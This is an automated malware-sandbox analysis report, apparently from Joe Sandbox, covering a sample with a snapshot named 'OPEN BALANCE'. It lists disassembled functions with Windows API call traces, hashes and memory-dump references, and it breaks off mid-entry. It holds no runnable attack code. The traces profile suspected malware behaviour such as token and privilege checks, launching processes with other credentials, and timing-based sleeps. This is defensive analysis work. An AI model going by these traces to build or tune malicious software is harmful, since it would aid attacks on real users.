Opcode Fuzzy Hash: 16d531f1b59ae74a97dd5850c02dbfc7188347b1ce7433a8c8c23b73aa1311e8
Instruction Fuzzy Hash: 8F218D705097069F9B10DF28C8818AEB7E4FE56324F104A1EF4AAC77A1E730D946CB93

Function 008A1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008A102A
Part of subcall function 008A1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008A1036
Part of subcall function 008A1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008A1045
Part of subcall function 008A1014: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008A104C
Part of subcall function 008A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008A1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008A15BE
_memcmp.LIBVCRUNTIME ref: 008A15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008A1617
HeapFree.KERNEL32(00000000), ref: 008A161E

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 2182266621-0
Opcode ID: ad92bb55ed0c15b2b4f61a8b9bd5e39b0ab6a9e676e29d73da1a607135dff9e5
Instruction ID: 25f533a49e188b6ebed7792fb84f735cd888c2a4151e6bceb8842cb1244df3e3
Opcode Fuzzy Hash: ad92bb55ed0c15b2b4f61a8b9bd5e39b0ab6a9e676e29d73da1a607135dff9e5
Instruction Fuzzy Hash: 65215531E41109EBEF00DFA4C949BEEB7B8FF55344F084459E441EB241E730AA05CBA0

Function 008D2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 008D280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 008D2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 008D2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008D2840

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 2b1338a1003fb29db9bb3fe9a579d29d3c000c5c53fdc22cf14c6f1fbddb8b61
Instruction ID: 0f1b91aee92f366902528d8d4b3c0328c6ec9ac04728164ed6d68934b7bb99f3
Opcode Fuzzy Hash: 2b1338a1003fb29db9bb3fe9a579d29d3c000c5c53fdc22cf14c6f1fbddb8b61
Instruction Fuzzy Hash: 6F21AE31205115AFD7149B28C844FAA7BA5FF55324F14835AE426CB7A2CB71EC42C791

Function 008A78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,008A790A,?,000000FF,?,008A8754,00000000,?,0000001C,?,?), ref: 008A8D8C
Part of subcall function 008A8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 008A8DB2
Part of subcall function 008A8D7D: lstrcmpiW.KERNEL32(00000000,?,008A790A,?,000000FF,?,008A8754,00000000,?,0000001C,?,?), ref: 008A8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,008A8754,00000000,?,0000001C,?,?,00000000), ref: 008A7923
lstrcpyW.KERNEL32(00000000,?), ref: 008A7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,008A8754,00000000,?,0000001C,?,?,00000000), ref: 008A7984

Strings

cdecl, xrefs: 008A797B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: c5e33048a8d13c09f6d449fe263d2391a5b8c8e4c883648768de5156c1e3f035
Instruction ID: 0c06421eb0c4e1ddc0f6fd11a48635e097edfb52f16c1fb1998c687cc128fcd4
Opcode Fuzzy Hash: c5e33048a8d13c09f6d449fe263d2391a5b8c8e4c883648768de5156c1e3f035
Instruction Fuzzy Hash: 7911293A201302AFEB155F38CC45E7B7BA9FF86350B00402BF902CB6A4EB359811D7A1

Function 008D7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 008D7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 008D7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008D7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008BB7AD,00000000), ref: 008D7D6B

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: b1e3fe526d622660b9e5eed036642d539510de329e77cad3f4bf8b93536dedb7
Instruction ID: 70687a23cc89f8e3a165bf64587bcff01b3fb856f35157a673f2f66f02173b89
Opcode Fuzzy Hash: b1e3fe526d622660b9e5eed036642d539510de329e77cad3f4bf8b93536dedb7
Instruction Fuzzy Hash: 2C11AF31619615AFCB109F28DC04EAA3BA6FF45370B15872AF93AC72F0E7309951DB50

Function 008D5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 008D56BB
_wcslen.LIBCMT ref: 008D56CD
_wcslen.LIBCMT ref: 008D56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 008D5816

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: a7e157d922216dfc109f3c58a7ded19fcc03b925d1dd547dad0d4048a8c655a8
Instruction ID: 1f656b9ae6c8a18fb94e6bed02f446241b3081945ebf0eb3b419210f95d1ac95
Opcode Fuzzy Hash: a7e157d922216dfc109f3c58a7ded19fcc03b925d1dd547dad0d4048a8c655a8
Instruction Fuzzy Hash: F111D671600608A6DB209F65DC85EEE7B6CFF10764F10426BF915D6281EB70C984CF65

Function 008A14CE Relevance: 6.1, APIs: 4, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008A14FF
OpenProcessToken.ADVAPI32(00000000), ref: 008A1506
CloseHandle.KERNEL32(00000004), ref: 008A1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008A154F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 9ea4524f568edc5f7c92a6bd67cfb459f55df48eeeb6b0fc67dc592698b6dd75
Instruction ID: fb22cd9178de1b44dbb9aa2e740e809ea21689bb5225291c291f83b70f9bde13
Opcode Fuzzy Hash: 9ea4524f568edc5f7c92a6bd67cfb459f55df48eeeb6b0fc67dc592698b6dd75
Instruction Fuzzy Hash: 2C11297250220EABEF118F98DD49BDE7BAAFF49744F044115FA05A21A0D375CE60DB60

Function 008A1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 008A1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008A1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008A1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008A1A8A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bc723686e44f83d510c2f4ee8a6b704cd556c57313295a439c07fbc97cfc67ac
Instruction ID: 683092f13a7ad8de4a1464e25afadc66bd93351a81c370b957810ccb16bbb78e
Opcode Fuzzy Hash: bc723686e44f83d510c2f4ee8a6b704cd556c57313295a439c07fbc97cfc67ac
Instruction Fuzzy Hash: C611FA3A901229FFEF119BA5C985FADBB78FB05750F200095E604B7290D7716E50DB94

Function 008AE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 008AE1FD
MessageBoxW.USER32(?,?,?,?), ref: 008AE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008AE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008AE24D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 2039ecc9050771a170e3a9db5c982e048586f88643eb2cdd647d0cb1b78e6297
Instruction ID: 28f3dcf3d5b2029065b4aae40ef99e526e89a8756fbd72a0d3bfa39ce36e519b
Opcode Fuzzy Hash: 2039ecc9050771a170e3a9db5c982e048586f88643eb2cdd647d0cb1b78e6297
Instruction Fuzzy Hash: CE11C876A04259BBDB119FA89C09BDE7FACFB46320F048756F924D3291D6749904C7A0

Function 0086D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0086CFF9,00000000,00000004,00000000), ref: 0086D218
GetLastError.KERNEL32 ref: 0086D224
__dosmaperr.LIBCMT ref: 0086D22B
ResumeThread.KERNEL32(00000000), ref: 0086D249

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 5079dedcb17251a0ad335ba06b4da8af051d1e489f27e9bf053f2afd97ff2034
Instruction ID: d8b52fa73d99b8d1d0d92ebf779549b5e0bf3f4fe5804f41722b94464036e214
Opcode Fuzzy Hash: 5079dedcb17251a0ad335ba06b4da8af051d1e489f27e9bf053f2afd97ff2034
Instruction Fuzzy Hash: 5D01C036E05208BBCB115BA9DC09AAA7B69FF82330F124319F925D62D1CFB1D941C6A1

Function 0084600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0084604C
GetStockObject.GDI32(00000011), ref: 00846060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0084606A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 404ceb5f8f1a6260f52f0a85cddabfe5a93d30b540dbee077a42e89961a34219
Instruction ID: d1bffd63da7f2883aa23fc8c3934f2dc35935d7d60c881f0bec8b10e92723ff3
Opcode Fuzzy Hash: 404ceb5f8f1a6260f52f0a85cddabfe5a93d30b540dbee077a42e89961a34219
Instruction Fuzzy Hash: AC11617250290DBFEF125F94DC44EEABBA9FF19365F040216FA14A2120D732DC60DB91

Function 00863B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00863B56

Part of subcall function 00863AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00863AD2
Part of subcall function 00863AA3: ___AdjustPointer.LIBCMT ref: 00863AED

_UnwindNestedFrames.LIBCMT ref: 00863B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00863B7C
CallCatchBlock.LIBVCRUNTIME ref: 00863BA4

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: d77087c849c7f657605d145df2d52d6f49582902c23c90d0002055364431ede1
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 1501E932100149BBDF125E99CC46EEF7B6AFF59764F064014FE48A6121C732E961EBA1

Function 00873073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008413C6,00000000,00000000,?,0087301A,008413C6,00000000,00000000,00000000,?,0087328B,00000006,FlsSetValue), ref: 008730A5
GetLastError.KERNEL32(?,0087301A,008413C6,00000000,00000000,00000000,?,0087328B,00000006,FlsSetValue,008E2290,FlsSetValue,00000000,00000364,?,00872E46), ref: 008730B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0087301A,008413C6,00000000,00000000,00000000,?,0087328B,00000006,FlsSetValue,008E2290,FlsSetValue,00000000), ref: 008730BF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e8e36108647695751d5168312c9bc7c2f05d6b0b5dd66703dca70a19cd64e39b
Instruction ID: 01ce397e58e4b529cb5f72b15f75332a6b66961314b3afb80f164296f7477132
Opcode Fuzzy Hash: e8e36108647695751d5168312c9bc7c2f05d6b0b5dd66703dca70a19cd64e39b
Instruction Fuzzy Hash: 50012B32356A37ABCB314B789C449577B98FF45B61B208720F90DE7294D721D901D6E1

Function 008A7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 008A747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008A7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008A74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008A74CA

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: e0521830793c13cc96815258aa19479f1232f369c3994bdd5bc9162365c6b34f
Instruction ID: 241db7d29e12e9d9d056a6812db654c72b00936ce7d695196695c29f6e564d8a
Opcode Fuzzy Hash: e0521830793c13cc96815258aa19479f1232f369c3994bdd5bc9162365c6b34f
Instruction Fuzzy Hash: 4711A1B12063169FF7208F14DC08B927BFCFB05B04F10856AE616D6551E7B0E944EB94

Function 008AB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008AACD3,?,00008000), ref: 008AB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008AACD3,?,00008000), ref: 008AB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008AACD3,?,00008000), ref: 008AB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008AACD3,?,00008000), ref: 008AB126

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: c560876fcb358a4db3414897d9bba90a527de8052352addfaf9d9ff5c43f33aa
Instruction ID: bc4ff8cd5d1d7261a43eaf72ad70f5eaaf71e7433a972126ad27776ff04d078c
Opcode Fuzzy Hash: c560876fcb358a4db3414897d9bba90a527de8052352addfaf9d9ff5c43f33aa
Instruction Fuzzy Hash: 2B113931D0192DEBDF00AFE4E9986EEBF78FF0A711F104196D941B2282DB305650CB51

Function 008A2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008A2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 008A2DD6
GetCurrentThreadId.KERNEL32 ref: 008A2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008A2DE4

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 9600ae76997ebc5ea7d1ddbdae0c12cb49ebd538e940422daa9a2a2bd497147a
Instruction ID: 993516a9160feaef805e1330add95d2c3c904c15ded5b5445c3ddb6a12b728f0
